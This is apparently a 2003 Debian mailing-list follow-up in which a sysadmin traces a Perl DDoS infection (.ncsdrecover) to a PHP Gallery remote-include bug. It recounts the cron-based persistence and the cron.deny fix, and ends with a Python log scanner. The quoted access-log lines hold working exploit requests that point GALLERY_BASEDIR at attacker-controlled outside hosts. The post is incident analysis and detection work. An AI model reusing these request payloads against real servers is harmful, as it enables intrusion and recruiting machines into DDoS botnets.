
Follow up on the NCSDRecover DDOS perl script



I've gotten some e-mails from people who were infected with .ncsdrecover, but it looks like my post is the only thing accessible via Google when you find it, so I thought that I would report back publicly with what I found was responsible for it and how it got removed.

Basically, people told me to look in my logs, and I found activity in the syslog indicating when the cron job was first added. Then I searched through my Apache access logs for that same time and found they were exploiting a bug in PHP Gallery on a site that had been left up. It basically allows you to set the directory to be an external site, and then you can run whatever the webserver will allow you to. In this case they upload a file to /tmp or /var/tmp, as they did after I merely killed the file and removed it. Then it adds a cron job to run the file, in this case .ncsdrecover, hourly. If you find the access log for the same time then you might see something like this:

access.log:216.72.155.74 - - [16/Jun/2003:05:44:31 -0500] "GET /ara/page/gallery/errors/configmode.php?GALLERY_BASEDIR=http://vddos.tripod.com/ HTTP/1.0" 403 306 "-" "Mozilla 5.0 [en-US]"
access.log:195.68.95.210 - - [17/Jun/2003:12:25:15 -0500] "GET /ara/page/gallery/errors/configmode.php?GALLERY_BASEDIR=http://ddos31337.tripod.com/ HTTP/1.0" 403 306 "-" "Mozilla 5.0 [en-US]"
access.log:195.68.95.210 - - [17/Jun/2003:18:48:05 -

It looks like they were still trying to infect me yesterday, but I had put www-data in cron.deny, and thus it prevented the script from being run.

I think that a lot of people are probably falling prey to this DDOS script right now, based upon e-mails I've received from people.

Shouldn't the Apache user be automatically denied from running cron jobs as a matter of security principle by default?

I have a question as to how safe a box is after it has been compromised by this perl script. I believe it opens up a shell account at 1337, but it shouldn't give them root access or the ability to log in as the web user at most, should it? Cuz if so, that would be bad news for a lot of people who got hacked via this. Regardless, I upgraded my kernel to the new version; is there anything else I should do to ensure there were no backdoors implemented by this? Also, thanks for all of the initial help and responses I received. The Debian community is truly a great example of mutual aid in effect.

Robert Ebright
sysadmin at azone.org

The script is posted at the link below if anybody who knows perl wants to review it.
http://archives.neohapsis.com/archives/linux/debian/2003-q2/0898.html
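The log correlation the post describes (scanning the Apache access log for requests that point GALLERY_BASEDIR at an external site) can be automated. The following is an added example, not code from the original message; the sample log lines are reconstructed from the post's excerpt plus one constructed benign request, and the regex assumes Apache's combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format, optionally prefixed with "access.log:" as grep prints it.
LOG_RE = re.compile(
    r'^(?:access\.log:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: two entries from the post, with a benign request in between.
SAMPLE_LOG = """\
216.72.155.74 - - [16/Jun/2003:05:44:31 -0500] "GET /ara/page/gallery/errors/configmode.php?GALLERY_BASEDIR=http://vddos.tripod.com/ HTTP/1.0" 403 306 "-" "Mozilla 5.0 [en-US]"
10.0.0.5 - - [16/Jun/2003:06:01:02 -0500] "GET /ara/page/gallery/index.php?page=2 HTTP/1.0" 200 1234 "-" "Mozilla 5.0 [en-US]"
195.68.95.210 - - [17/Jun/2003:12:25:15 -0500] "GET /ara/page/gallery/errors/configmode.php?GALLERY_BASEDIR=http://ddos31337.tripod.com/ HTTP/1.0" 403 306 "-" "Mozilla 5.0 [en-US]"
"""

REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def find_remote_includes(log_text):
    """Return (ip, timestamp, parameter, url, status) for every request whose
    query string carries a parameter set to an external URL. This is the
    remote-include pattern of the GALLERY_BASEDIR requests in the post; the
    timestamps are what you line up against the cron entries in syslog."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m.group("path")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append((m.group("ip"), m.group("ts"), name, value,
                             int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for ip, ts, name, url, status in find_remote_includes(SAMPLE_LOG):
        print(f"{ts} {ip} {name}={url} (status {status})")
```

The HTTP status is reported but not used to filter: a 403 on one attempt says nothing about whether an earlier or later one succeeded, so every matching request is worth checking against the syslog cron timestamps.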
